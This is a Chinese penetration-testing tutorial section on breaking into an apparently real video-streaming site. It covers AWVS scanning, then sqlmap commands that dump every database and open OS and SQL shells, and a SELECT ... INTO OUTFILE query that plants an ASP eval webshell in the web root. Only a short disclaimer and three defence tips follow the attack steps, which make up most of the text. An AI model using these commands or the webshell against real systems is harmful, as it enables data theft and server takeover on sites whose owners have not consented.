6.9 扫描并渗透某快播站点
6.9.1 扫描结果分析
1. 使用AWVS对目标进行扫描
2. 查看漏洞情况
需要注意的点:
(1) 不同的漏洞有不同的处理方法
(2) 可以根据扫描结果名称寻找漏洞的利用方法
(3) 之后就是一些sqlmap常规套路,前面章节演示了很多次,大家可以翻看前面章节内容
导出全部数据库
sqlmap.py -r bmfx.txt -D bmfx --dump-all
导出全部数存在法律风险,请大家一定要清楚,非法导出数据导致法律责任与本人无关
6.9.3 渗透利用思路
1. 渗透提权
sqlmap.py -r bmfx.txt --os-shell
2. 对服务器端口进行扫描
使用nmap或者masscan进行全端口扫描
3. 未能获取后台地址
4. 对存在跨站漏洞的地方进行跨站测试
5. 导出一句话后门
(1) 获取MySQL数据库保存地址
sqlmap.py -r bmfx.txt --sql-shell 如果成功执行命令,那么可以长执行select @@datadir 获取数据保存的位置
(2) 使用如下方式获取webshell
select '<%eval request("bmfx")%>' into outfile 'C:/interpub/wwwroot/bmfx.asp'
6.9.4 渗透总结与防御
1. 渗透总结
(1) 通过AWVS扫描出get参数存在SQL注入
(2) 通过分析头文件,将HTTP请求包数据保存为txt文件
(3) 通过sqlmap.py -r bmfx.txt 命令进行SQL注入测试
(4) 对目标SQL注入测试与其他测试一样,不同的就是名称不一样
(5) MySQL数据库root账号导出一句话后门
2. 安全防御
(1) 使用公开漏洞扫描软件对站点进行安全扫描,对存在漏洞的地方进行修复
(2) 增加WAF等相关应用层防火墙软件
(3) MySQL数据库用户应设置强健的密码